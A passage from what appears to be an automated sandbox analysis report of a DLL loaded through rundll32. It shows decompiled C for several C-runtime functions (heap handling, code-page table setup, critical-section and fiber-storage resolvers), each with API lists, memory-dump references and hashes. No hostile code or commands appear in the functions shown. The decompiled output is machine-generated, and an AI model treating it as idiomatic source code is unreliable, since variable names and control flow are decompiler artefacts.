				_t33 = E6E776670(E6E775374(_t5, _t29));
				if(_t33 == 0) {
					_push(_t29);
					_t1 = E6E77111C() + 0x28; // 0x28
					_t19 = E6E7783B2(_t1, 0, 0, 0);
					_t31 = HeapAlloc(GetProcessHeap(), 0, _t19 << 2);
					if(_t31 != 0) {
						_t2 = E6E77111C() + 0x28; // 0x28
						E6E7783B2(_t2, _t31, _t19, _t31);
						_t28 = 0;
						if(_t19 > 0) {
							while(_t33 == 0) {
								_t17 = E6E776670( *((intOrPtr*)(_t31 + _t28 * 4)));
								_t28 = _t28 + 1;
								_t33 = _t17;
								if(_t28 < _t19) {
									continue;
								}
								goto L5;
							}
						}
						L5:
						HeapFree(GetProcessHeap(), 0, _t31);
					}
				}
				return _t33;
			}










                                                      0x6e7766b9
                                                      0x6e7766ba
                                                      0x6e7766cd
                                                      0x6e7766d1
                                                      0x6e7766d4
                                                      0x6e7766de
                                                      0x6e7766e6
                                                      0x6e7766fc
                                                      0x6e776700
                                                      0x6e776709
                                                      0x6e77670c
                                                      0x6e776711
                                                      0x6e776715
                                                      0x6e776717
                                                      0x6e77671f
                                                      0x6e776724
                                                      0x6e776725
                                                      0x6e776729
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x6e776729
                                                      0x6e776717
                                                      0x6e77672b
                                                      0x6e776735
                                                      0x6e776735
                                                      0x6e77673c
                                                      0x6e776740

                                                      APIs
                                                        • Part of subcall function 6E77111C: __EH_prolog3.LIBCMT ref: 6E771123
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6E7766EF
                                                      • HeapAlloc.KERNEL32(00000000), ref: 6E7766F6
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6E77672E
                                                      • HeapFree.KERNEL32(00000000), ref: 6E776735
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: Heap$Process$AllocFreeH_prolog3
                                                      • String ID:
                                                      • API String ID: 2654106454-0
                                                      • Opcode ID: 5e709d7c3ffd0bbbc12fb2253ab0446a6ab237d1adb83b51b6c88c16735ed8a6
                                                      • Instruction ID: cb943c7b826957d6f5162e3fa0ceb8e1c348b59ce72eeecd84744c308f7916f1
                                                      • Opcode Fuzzy Hash: 5e709d7c3ffd0bbbc12fb2253ab0446a6ab237d1adb83b51b6c88c16735ed8a6
                                                      • Instruction Fuzzy Hash: F401A7B1A105511ADF356FF5AEACEAF257D9BDB6947110938E5038B238DF20CD0187E0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E782084, Relevance: 4.7, APIs: 3, Instructions: 199COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 61%
                                                      			E6E782084(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				intOrPtr _v12;
				void* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t41;
				signed int _t49;
				void* _t52;
				void* _t54;
				signed int _t56;
				void* _t60;
				intOrPtr _t63;
				void* _t64;
				intOrPtr _t68;
				void* _t70;
				intOrPtr* _t71;
				intOrPtr _t85;
				void* _t88;
				intOrPtr* _t90;
				intOrPtr _t92;
				void* _t93;
				signed int _t95;
				void* _t96;
				intOrPtr* _t97;
				intOrPtr* _t99;
				void* _t102;

				_push(__ecx);
				_push(__ecx);
				_t41 =  *0x6e78c00c; // 0x9bbef7a8
				_v8 = _t41 ^ _t95;
				_t92 = _a20;
				if(_t92 > 0) {
					_t68 = E6E782A0D(_a16, _t92);
					_t102 = _t68 - _t92;
					_t4 = _t68 + 1; // 0x1
					_t92 = _t4;
					if(_t102 >= 0) {
						_t92 = _t68;
					}
				}
				_t87 = _a32;
				if(_a32 == 0) {
					_t87 =  *((intOrPtr*)( *_a4 + 8));
					_a32 =  *((intOrPtr*)( *_a4 + 8));
				}
				_t85 = E6E7804C3(_t87, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t92, 0, 0);
				_t97 = _t96 + 0x18;
				_v12 = _t85;
				if(_t85 == 0) {
					L39:
					_pop(_t88);
					_pop(_t93);
					_pop(_t70);
					return E6E778727(_t70, _v8 ^ _t95, _t85, _t88, _t93);
				} else {
					_t17 = _t85 + _t85 + 8; // 0x8
					asm("sbb eax, eax");
					_t49 = _t85 + _t85 & _t17;
					if(_t49 == 0) {
						_t71 = 0;
						L15:
						if(_t71 == 0) {
							L37:
							_t94 = 0;
							L38:
							E6E781A2D(_t71);
							goto L39;
						}
						_t52 = E6E7804C3(_t87, 1, _a16, _t92, _t71, _t85);
						_t99 = _t97 + 0x18;
						if(_t52 == 0) {
							goto L37;
						}
						_t89 = _v12;
						_t54 = E6E77D9C1(_a8, _a12, _t71, _v12, 0, 0, 0, 0, 0); // executed
						_t94 = _t54;
						if(_t94 == 0) {
							goto L37;
						}
						_t85 = 0x400;
						if((_a12 & 0x00000400) == 0) {
							_t31 = _t94 + _t94 + 8; // 0x8
							asm("sbb eax, eax");
							_t56 = _t94 + _t94 & _t31;
							if(_t56 == 0) {
								_t90 = 0;
								L31:
								if(_t90 == 0 || E6E77D9C1(_a8, _a12, _t71, _v12, _t90, _t94, 0, 0, 0) == 0) {
									L36:
									E6E781A2D(_t90);
									goto L37;
								} else {
									_push(0);
									_push(0);
									if(_a28 != 0) {
										_push(_a28);
										_push(_a24);
									} else {
										_push(0);
										_push(0);
									}
									_push(_t94);
									_push(_t90);
									_push(0);
									_push(_a32);
									_t60 = E6E78053F();
									_t94 = _t60;
									if(_t60 != 0) {
										E6E781A2D(_t90);
										goto L38;
									} else {
										goto L36;
									}
								}
							}
							if(_t56 > 0x400) {
								_t90 = E6E77E9C4(_t56);
								if(_t90 == 0) {
									goto L36;
								}
								 *_t90 = 0xdddd;
								L29:
								_t90 = _t90 + 8;
								goto L31;
							}
							E6E784470();
							_t90 = _t99;
							if(_t90 == 0) {
								goto L36;
							}
							 *_t90 = 0xcccc;
							goto L29;
						}
						_t63 = _a28;
						if(_t63 == 0) {
							goto L38;
						}
						if(_t94 > _t63) {
							goto L37;
						}
						_t64 = E6E77D9C1(_a8, _a12, _t71, _t89, _a24, _t63, 0, 0, 0);
						_t94 = _t64;
						if(_t64 != 0) {
							goto L38;
						}
						goto L37;
					}
					if(_t49 > 0x400) {
						_t71 = E6E77E9C4(_t49);
						if(_t71 == 0) {
							L13:
							_t85 = _v12;
							goto L15;
						}
						 *_t71 = 0xdddd;
						L12:
						_t71 = _t71 + 8;
						goto L13;
					}
					E6E784470();
					_t71 = _t97;
					if(_t71 == 0) {
						goto L13;
					}
					 *_t71 = 0xcccc;
					goto L12;
				}
			}






























                                                      0x6e782089
                                                      0x6e78208a
                                                      0x6e78208b
                                                      0x6e782092
                                                      0x6e782097
                                                      0x6e78209d
                                                      0x6e7820a3
                                                      0x6e7820a9
                                                      0x6e7820ac
                                                      0x6e7820ac
                                                      0x6e7820af
                                                      0x6e7820b1
                                                      0x6e7820b1
                                                      0x6e7820af
                                                      0x6e7820b3
                                                      0x6e7820b8
                                                      0x6e7820bf
                                                      0x6e7820c2
                                                      0x6e7820c2
                                                      0x6e7820e3
                                                      0x6e7820e5
                                                      0x6e7820e8
                                                      0x6e7820ed
                                                      0x6e78224b
                                                      0x6e78224e
                                                      0x6e78224f
                                                      0x6e782250
                                                      0x6e78225c
                                                      0x6e7820f3
                                                      0x6e7820f6
                                                      0x6e7820fb
                                                      0x6e7820fd
                                                      0x6e7820ff
                                                      0x6e782136
                                                      0x6e782138
                                                      0x6e78213a
                                                      0x6e782240
                                                      0x6e782240
                                                      0x6e782242
                                                      0x6e782243
                                                      0x00000000
                                                      0x6e782249
                                                      0x6e782149
                                                      0x6e78214e
                                                      0x6e782153
                                                      0x00000000
                                                      0x00000000
                                                      0x6e782159
                                                      0x6e78216b
                                                      0x6e782170
                                                      0x6e782174
                                                      0x00000000
                                                      0x00000000
                                                      0x6e78217a
                                                      0x6e782182
                                                      0x6e7821bf
                                                      0x6e7821c4
                                                      0x6e7821c6
                                                      0x6e7821c8
                                                      0x6e7821f9
                                                      0x6e7821fb
                                                      0x6e7821fd
                                                      0x6e782239
                                                      0x6e78223a
                                                      0x00000000
                                                      0x6e78221a
                                                      0x6e78221c
                                                      0x6e78221d
                                                      0x6e782221
                                                      0x6e78225d
                                                      0x6e782260
                                                      0x6e782223
                                                      0x6e782223
                                                      0x6e782224
                                                      0x6e782224
                                                      0x6e782225
                                                      0x6e782226
                                                      0x6e782227
                                                      0x6e782228
                                                      0x6e78222b
                                                      0x6e782230
                                                      0x6e782237
                                                      0x6e782266
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x6e782237
                                                      0x6e7821fd
                                                      0x6e7821cc
                                                      0x6e7821e7
                                                      0x6e7821ec
                                                      0x00000000
                                                      0x00000000
                                                      0x6e7821ee
                                                      0x6e7821f4
                                                      0x6e7821f4
                                                      0x00000000
                                                      0x6e7821f4
                                                      0x6e7821ce
                                                      0x6e7821d3
                                                      0x6e7821d7
                                                      0x00000000
                                                      0x00000000
                                                      0x6e7821d9
                                                      0x00000000
                                                      0x6e7821d9
                                                      0x6e782184
                                                      0x6e782189
                                                      0x00000000
                                                      0x00000000
                                                      0x6e782191
                                                      0x00000000
                                                      0x00000000
                                                      0x6e7821a8
                                                      0x6e7821ad
                                                      0x6e7821b1
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x6e7821b7
                                                      0x6e782106
                                                      0x6e782121
                                                      0x6e782126
                                                      0x6e782131
                                                      0x6e782131
                                                      0x00000000
                                                      0x6e782131
                                                      0x6e782128
                                                      0x6e78212e
                                                      0x6e78212e
                                                      0x00000000
                                                      0x6e78212e
                                                      0x6e782108
                                                      0x6e78210d
                                                      0x6e782111
                                                      0x00000000
                                                      0x00000000
                                                      0x6e782113
                                                      0x00000000
                                                      0x6e782113

                                                      APIs
                                                      • __freea.LIBCMT ref: 6E78223A
                                                        • Part of subcall function 6E77E9C4: HeapAlloc.KERNEL32(00000000,558B0000,558B0000,?,6E77FFF0,00000220,6E77DFAC,558B0000,?,?,?,?,00000000,00000000,?,6E77DFAC), ref: 6E77E9F6
                                                      • __freea.LIBCMT ref: 6E782243
                                                      • __freea.LIBCMT ref: 6E782266
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: __freea$AllocHeap
                                                      • String ID:
                                                      • API String ID: 85559729-0
                                                      • Opcode ID: 9bd14db91932e6aefe1249636701e32c5049b03fa5c4992820ce8c1e4753cdfb
                                                      • Instruction ID: adceda0ea514f89c4486b8e86cc5563e4eb3ed3ed142486c606b180c7b6812a7
                                                      • Opcode Fuzzy Hash: 9bd14db91932e6aefe1249636701e32c5049b03fa5c4992820ce8c1e4753cdfb
                                                      • Instruction Fuzzy Hash: 6351D572600296AFEF148EE5DE44EEB36ADEF65355F220539FD14A7170E730DC418AA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E80381A, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 6E80383F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: Info
                                                      • String ID:
                                                      • API String ID: 1807457897-3916222277
                                                      • Opcode ID: 528da20d298afd845dbd92f3111bfe7d2d27a105c8f24676b29567fb734e74f6
                                                      • Instruction ID: adc72275563b95288a8bebe86d7b8d1e9c92c6d2b6211d19817fdc393e9ef44a
                                                      • Opcode Fuzzy Hash: 528da20d298afd845dbd92f3111bfe7d2d27a105c8f24676b29567fb734e74f6
                                                      • Instruction Fuzzy Hash: A441297050838C9FDB218FA88D88FEABBB9DF46308F1408EDD59A97142D2359E45CF60
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E77FE32, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E6E77FE32(void* __edx, intOrPtr _a4) {
				signed int _v8;
				char _v264;
				char _v520;
				char _v776;
				char _v1800;
				char _v1814;
				struct _cpinfo _v1820;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t58;
				signed int _t61;
				char _t67;
				signed char _t68;
				signed int _t69;
				signed int _t79;
				signed int _t80;
				char _t81;
				signed int _t84;
				signed char _t85;
				signed int _t86;
				signed int _t88;
				void* _t89;
				intOrPtr _t90;
				signed int _t91;

				_t58 =  *0x6e78c00c; // 0x9bbef7a8
				_v8 = _t58 ^ _t91;
				_t90 = _a4;
				if( *(_t90 + 4) == 0xfde9) {
					L19:
					_t80 = 0;
					__eflags = 0;
					_t89 = 0x100;
					_t81 = 0;
					do {
						_t46 = _t81 - 0x61; // -97
						_t88 = _t46;
						_t47 = _t88 + 0x20; // -65
						__eflags = _t47 - 0x19;
						if(_t47 > 0x19) {
							__eflags = _t88 - 0x19;
							if(_t88 > 0x19) {
								_t61 = _t80;
							} else {
								_t53 = _t90 + 0x19; // 0x6e780276
								 *(_t53 + _t81) =  *(_t53 + _t81) | 0x00000020;
								_t54 = _t81 - 0x20; // -32
								_t61 = _t54;
							}
						} else {
							 *(_t90 + _t81 + 0x19) =  *(_t90 + _t81 + 0x19) | 0x00000010;
							_t52 = _t81 + 0x20; // 0x20
							_t61 = _t52;
						}
						 *(_t90 + _t81 + 0x119) = _t61;
						_t81 = _t81 + 1;
						__eflags = _t81 - _t89;
					} while (_t81 < _t89);
					L26:
					return E6E778727(_t80, _v8 ^ _t91, _t88, _t89, _t90);
				}
				_t5 = _t90 + 4; // 0xe8458d00
				if(GetCPInfo( *_t5,  &_v1820) == 0) {
					goto L19;
				} else {
					_t80 = 0;
					_t89 = 0x100;
					_t67 = 0;
					do {
						 *((char*)(_t91 + _t67 - 0x104)) = _t67;
						_t67 = _t67 + 1;
					} while (_t67 < 0x100);
					_t68 = _v1814;
					_t84 =  &_v1814;
					_v264 = 0x20;
					while(1) {
						_t99 = _t68;
						if(_t68 == 0) {
							break;
						}
						_t88 =  *(_t84 + 1) & 0x000000ff;
						_t69 = _t68 & 0x000000ff;
						while(1) {
							__eflags = _t69 - _t88;
							if(_t69 > _t88) {
								break;
							}
							__eflags = _t69 - _t89;
							if(_t69 >= _t89) {
								break;
							}
							 *((char*)(_t91 + _t69 - 0x104)) = 0x20;
							_t69 = _t69 + 1;
							__eflags = _t69;
						}
						_t84 = _t84 + 2;
						__eflags = _t84;
						_t68 =  *_t84;
					}
					_t14 = _t90 + 4; // 0xe8458d00
					E6E78192A(_t88, _t99, _t80, 1,  &_v264, _t89,  &_v1800,  *_t14, _t80);
					_t17 = _t90 + 4; // 0xe8458d00
					_t20 = _t90 + 0x21c; // 0x42d23303
					E6E78226E(_t99, _t80,  *_t20, _t89,  &_v264, _t89,  &_v520, _t89,  *_t17, _t80); // executed
					_t22 = _t90 + 4; // 0xe8458d00
					_t24 = _t90 + 0x21c; // 0x42d23303
					E6E78226E(_t99, _t80,  *_t24, 0x200,  &_v264, _t89,  &_v776, _t89,  *_t22, _t80);
					_t79 = _t80;
					do {
						_t85 =  *(_t91 + _t79 * 2 - 0x704) & 0x0000ffff;
						if((_t85 & 0x00000001) == 0) {
							__eflags = _t85 & 0x00000002;
							if((_t85 & 0x00000002) == 0) {
								_t86 = _t80;
							} else {
								 *(_t90 + _t79 + 0x19) =  *(_t90 + _t79 + 0x19) | 0x00000020;
								_t86 =  *((intOrPtr*)(_t91 + _t79 - 0x304));
							}
						} else {
							 *(_t90 + _t79 + 0x19) =  *(_t90 + _t79 + 0x19) | 0x00000010;
							_t86 =  *((intOrPtr*)(_t91 + _t79 - 0x204));
						}
						 *(_t90 + _t79 + 0x119) = _t86;
						_t79 = _t79 + 1;
					} while (_t79 < _t89);
					goto L26;
				}
			}




























                                                      0x6e77fe3d
                                                      0x6e77fe44
                                                      0x6e77fe49
                                                      0x6e77fe54
                                                      0x6e77ff66
                                                      0x6e77ff66
                                                      0x6e77ff66
                                                      0x6e77ff68
                                                      0x6e77ff6d
                                                      0x6e77ff6f
                                                      0x6e77ff6f
                                                      0x6e77ff6f
                                                      0x6e77ff72
                                                      0x6e77ff75
                                                      0x6e77ff78
                                                      0x6e77ff84
                                                      0x6e77ff87
                                                      0x6e77ff96
                                                      0x6e77ff89
                                                      0x6e77ff89
                                                      0x6e77ff8e
                                                      0x6e77ff91
                                                      0x6e77ff91
                                                      0x6e77ff91
                                                      0x6e77ff7a
                                                      0x6e77ff7a
                                                      0x6e77ff7f
                                                      0x6e77ff7f
                                                      0x6e77ff7f
                                                      0x6e77ff98
                                                      0x6e77ff9f
                                                      0x6e77ffa0
                                                      0x6e77ffa0
                                                      0x6e77ffa4
                                                      0x6e77ffb2
                                                      0x6e77ffb2
                                                      0x6e77fe61
                                                      0x6e77fe6c
                                                      0x00000000
                                                      0x6e77fe72
                                                      0x6e77fe72
                                                      0x6e77fe74
                                                      0x6e77fe79
                                                      0x6e77fe7b
                                                      0x6e77fe7b
                                                      0x6e77fe82
                                                      0x6e77fe83
                                                      0x6e77fe87
                                                      0x6e77fe8d
                                                      0x6e77fe93
                                                      0x6e77febb
                                                      0x6e77febb
                                                      0x6e77febd
                                                      0x00000000
                                                      0x00000000
                                                      0x6e77fe9c
                                                      0x6e77fea0
                                                      0x6e77feb2
                                                      0x6e77feb2
                                                      0x6e77feb4
                                                      0x00000000
                                                      0x00000000
                                                      0x6e77fea5
                                                      0x6e77fea7
                                                      0x00000000
                                                      0x00000000
                                                      0x6e77fea9
                                                      0x6e77feb1
                                                      0x6e77feb1
                                                      0x6e77feb1
                                                      0x6e77feb6
                                                      0x6e77feb6
                                                      0x6e77feb9
                                                      0x6e77feb9
                                                      0x6e77fec0
                                                      0x6e77fed5
                                                      0x6e77fedb
                                                      0x6e77feef
                                                      0x6e77fef6
                                                      0x6e77ff05
                                                      0x6e77ff17
                                                      0x6e77ff1e
                                                      0x6e77ff26
                                                      0x6e77ff28
                                                      0x6e77ff28
                                                      0x6e77ff33
                                                      0x6e77ff43
                                                      0x6e77ff46
                                                      0x6e77ff56
                                                      0x6e77ff48
                                                      0x6e77ff48
                                                      0x6e77ff4d
                                                      0x6e77ff4d
                                                      0x6e77ff35
                                                      0x6e77ff35
                                                      0x6e77ff3a
                                                      0x6e77ff3a
                                                      0x6e77ff58
                                                      0x6e77ff5f
                                                      0x6e77ff60
                                                      0x00000000
                                                      0x6e77ff64

                                                      APIs
                                                      • GetCPInfo.KERNEL32(E8458D00,?,6E77DFB8,6E77DFAC,00000000), ref: 6E77FE64
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: Info
                                                      • String ID:
                                                      • API String ID: 1807457897-3916222277
                                                      • Opcode ID: c89eef33e6659b3b5f87473b816171953ae0ebb77c9e6b3e784cbd6f87405de8
                                                      • Instruction ID: 41ae3a9af6958526bca4563fa91d6e0777848f290a8849729265093a6a1d2d2e
                                                      • Opcode Fuzzy Hash: c89eef33e6659b3b5f87473b816171953ae0ebb77c9e6b3e784cbd6f87405de8
                                                      • Instruction Fuzzy Hash: 804127715042999EEF358A98CF94BEB7BFDAB16308F2404BCE59A87153D7709A44CB20
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E77D976, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 37%
                                                      			E6E77D976(void* __eflags, struct _CRITICAL_SECTION* _a4, long _a8, intOrPtr _a12) {
				int _t7;
				intOrPtr* _t11;

				_t11 = E6E77D795(0x12, "InitializeCriticalSectionEx", 0x6e7864b4, 0x6e7864bc);
				if(_t11 == 0) {
					_t7 = InitializeCriticalSectionAndSpinCount(_a4, _a8); // executed
					return _t7;
				}
				 *0x6e785148(_a4, _a8, _a12);
				return  *_t11();
			}





                                                      0x6e77d992
                                                      0x6e77d999
                                                      0x6e77d9b6
                                                      0x00000000
                                                      0x6e77d9b6
                                                      0x6e77d9a6
                                                      0x00000000

                                                      APIs
                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?), ref: 6E77D9B6
                                                      Strings
                                                      • InitializeCriticalSectionEx, xrefs: 6E77D986
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: CountCriticalInitializeSectionSpin
                                                      • String ID: InitializeCriticalSectionEx
                                                      • API String ID: 2593887523-3084827643
                                                      • Opcode ID: b2a28432533e3cbd0f09be2b0af4460f73787c28f091bc05219d4c9d394e0b14
                                                      • Instruction ID: 1a485ebc40dbac17a63261b7738040c6b336acdda2c307d3c03296d6a176bfb5
                                                      • Opcode Fuzzy Hash: b2a28432533e3cbd0f09be2b0af4460f73787c28f091bc05219d4c9d394e0b14
                                                      • Instruction Fuzzy Hash: A7E0ED36441518B7CF112ED1DD08DDF3F1ADB66761B018434FE1969231E6328A61AED4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E77D877, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22memoryCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 37%
                                                      			E6E77D877(void* __eflags, intOrPtr _a4) {
				intOrPtr* _t2;
				intOrPtr* _t7;

				_t2 = E6E77D795(3, "FlsAlloc", 0x6e786494, 0x6e78649c); // executed
				_t7 = _t2;
				if(_t7 == 0) {
					return TlsAlloc();
				}
				 *0x6e785148(_a4);
				return  *_t7();
			}





                                                      0x6e77d88e
                                                      0x6e77d893
                                                      0x6e77d89a
                                                      0x00000000
                                                      0x6e77d8ab
                                                      0x6e77d8a1
                                                      0x00000000

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: Alloc
                                                      • String ID: FlsAlloc
                                                      • API String ID: 2773662609-671089009
                                                      • Opcode ID: f3affead7015f49c3665305e31fb7089e394afda96715d51a8ad571d192c366e
                                                      • Instruction ID: 65042754cb7e6efef4a0bec3b915e97ae72974cbc8d20a1b87462c0997abd3f0
                                                      • Opcode Fuzzy Hash: f3affead7015f49c3665305e31fb7089e394afda96715d51a8ad571d192c366e
                                                      • Instruction Fuzzy Hash: CFE0C23249062477CE2136E1AE08E9F3E0F9BA3760B000030FA0D2D331AA215B024ADA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E803BC4, Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 6E803742: GetOEMCP.KERNEL32(00000000,?,?,6E8039CB,?), ref: 6E80376D
                                                      • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,6E803A10,?,00000000), ref: 6E803C38
                                                      • GetCPInfo.KERNEL32(00000000,6E803A10,?,?,?,6E803A10,?,00000000), ref: 6E803C4B
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: CodeInfoPageValid
                                                      • String ID:
                                                      • API String ID: 546120528-0
                                                      • Opcode ID: 59cbfd705b35b7bd20c40537f1489390c08cdd40a91af187f00b2995f1ff8924
                                                      • Instruction ID: 4eaa348811f755a84e61fc09331d9e46003328b8b13a260722c9f7cd16fc93f7
                                                      • Opcode Fuzzy Hash: 59cbfd705b35b7bd20c40537f1489390c08cdd40a91af187f00b2995f1ff8924
                                                      • Instruction Fuzzy Hash: 2D514870A0424A9FE7628FB5CC58EAABBB5EF42314F004C3ED496CB291D7359905CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7801C7, Relevance: 3.2, APIs: 2, Instructions: 166COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 97%
                                                      			E6E7801C7(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				signed int _v32;
				signed int _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t51;
				signed int _t60;
				signed int _t61;
				short _t64;
				signed char _t66;
				signed int _t67;
				signed char* _t76;
				signed char* _t77;
				int _t79;
				signed int _t84;
				signed char* _t85;
				short* _t86;
				signed int _t87;
				signed char _t88;
				signed int _t89;
				void* _t90;
				signed int _t91;
				signed int _t92;
				short _t93;
				signed int _t94;
				intOrPtr _t96;
				signed int _t97;

				_t90 = __edx;
				_t51 =  *0x6e78c00c; // 0x9bbef7a8
				_v8 = _t51 ^ _t97;
				_t96 = _a8;
				_t79 = E6E77FD5C(__eflags, _a4);
				if(_t79 == 0) {
					L36:
					E6E77FDCD(_t96);
					goto L37;
				} else {
					_t93 = 0;
					_t84 = 0;
					_t57 = 0;
					_v32 = 0;
					while( *((intOrPtr*)(_t57 + 0x6e78c608)) != _t79) {
						_t84 = _t84 + 1;
						_t57 = _t57 + 0x30;
						_v32 = _t84;
						if(_t57 < 0xf0) {
							continue;
						} else {
							if(_t79 == 0xfde8 || IsValidCodePage(_t79 & 0x0000ffff) == 0) {
								L22:
							} else {
								if(_t79 != 0xfde9) {
									_t57 = GetCPInfo(_t79,  &_v28);
									__eflags = _t57;
									if(_t57 == 0) {
										__eflags =  *0x6e78d318 - _t93; // 0x0
										if(__eflags != 0) {
											goto L36;
										} else {
											goto L22;
										}
									} else {
										_t14 = _t96 + 0x18; // 0x6e77dfc4
										E6E779DB0(_t93, _t14, _t93, 0x101);
										 *(_t96 + 4) = _t79;
										__eflags = _v28 - 2;
										 *((intOrPtr*)(_t96 + 0x21c)) = _t93;
										if(_v28 == 2) {
											__eflags = _v22;
											_t76 =  &_v22;
											if(_v22 != 0) {
												while(1) {
													_t88 = _t76[1];
													__eflags = _t88;
													if(_t88 == 0) {
														goto L18;
													}
													_t91 = _t88 & 0x000000ff;
													_t89 =  *_t76 & 0x000000ff;
													while(1) {
														__eflags = _t89 - _t91;
														if(_t89 > _t91) {
															break;
														}
														 *(_t96 + _t89 + 0x19) =  *(_t96 + _t89 + 0x19) | 0x00000004;
														_t89 = _t89 + 1;
														__eflags = _t89;
													}
													_t76 =  &(_t76[2]);
													__eflags =  *_t76;
													if( *_t76 != 0) {
														continue;
													}
													goto L18;
												}
											}
											L18:
											_t25 = _t96 + 0x1a; // 0x6e77dfc6
											_t77 = _t25;
											_t87 = 0xfe;
											do {
